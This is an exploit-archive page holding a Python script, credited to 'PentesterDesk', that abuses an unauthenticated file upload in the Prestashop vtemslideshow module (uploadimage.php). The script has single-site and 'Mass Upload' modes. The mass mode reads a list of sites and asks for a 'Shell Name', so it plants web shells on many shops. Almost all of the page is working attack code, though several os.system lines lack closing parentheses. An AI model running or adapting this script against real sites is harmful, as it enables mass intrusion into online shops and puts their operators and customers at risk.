Prestashop VtermSlideShow Module Arbitrary File Upload Exploit



EKU-ID: 5801 CVE: OSVDB-ID:
Author: PentesterDesk Published: 2016-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
####################################################################################
#Author  : PentesterDesk
#Date    : 10-July-2016
#Software: Prestashop CMS
#vuln Mod: vtermslidesshow
#Greetz to all indian hackers and special thanks to Muhammad Faisal
####################################################################################
import sys, os
import requests
def main():
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
  
        banner = '''
  
                        +======================================================+
                        |    Prestashop  |  FileUpload Exp   |  PentesterDesk  |
                        |         Coded by : PentesterDesk Team                |
                        |         Contact  : pentesterdesk@gmail.com           |
                        +======================================================+
                        '''
        print banner
  
#/modules/vtermslidesshow/
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
        print banner
        print "\n                       <==============[[VtermSlideShow Exploit]]==============>\n"
        print "[1] Single Site "
        print "[2] Mass Upload"
        ch=raw_input("\n[>] ")
        if ch == '1':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
          
                print "\n                       <==============[[VtermSlideShow Exploit]]==============>\n"
  
                url = raw_input("[+] Enter Url  : ")
                filname= raw_input("[+] Enter File : ")
                if filname == '' or url == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        main()
                url = url + "/modules/vtemslideshow/uploadimage.php"
#main
                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                req=requests.post(url,files=files)
                print(req.text)
                final =[]
                final = (req.text).split(":")
                if req.status_code == 200 and filname in req.text:
                        url=url.replace('/uploadimage.php','/slides/'+final[1])
                        print ("[+] %s [ok]" % (url))
                else:
                        print "\n[+] %s [No]\n" %url
                        raw_input("\n[+] Press Enter [>] ")
#mass
        if ch == '2':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
                print "\n                       <==============[[VtermSlideShow Exploit]]==============>\n"
                filee = raw_input("[+] Enter List  Name : ")
                filname= raw_input("[+] Enter Shell Name : ")
                if filname == '' or filee == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        main()
                ob = open(filee,'r')
                lists = ob.readlines()
                list1 = []
                i = 0
                for i in range(len(lists)):
                        list1.append(lists[i].strip('\n'))
                count = 0
                for site in (list1):
                        count = count + 1
                        url = site + "modules/vtemslideshow/uploadimage.php"
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        final =[]
                        final = (req.text).split(":")
                        if req.status_code == 200 and filname in req.text:
                                url=url.replace('/uploadimage.php','/slides/'+final[1])
                                print ("[%d] %s [ ok ]" % (count,url))
                        else:
                                print ("[%d]  %s [ No ]" % (count,url))
if __name__ == "__main__":
    main()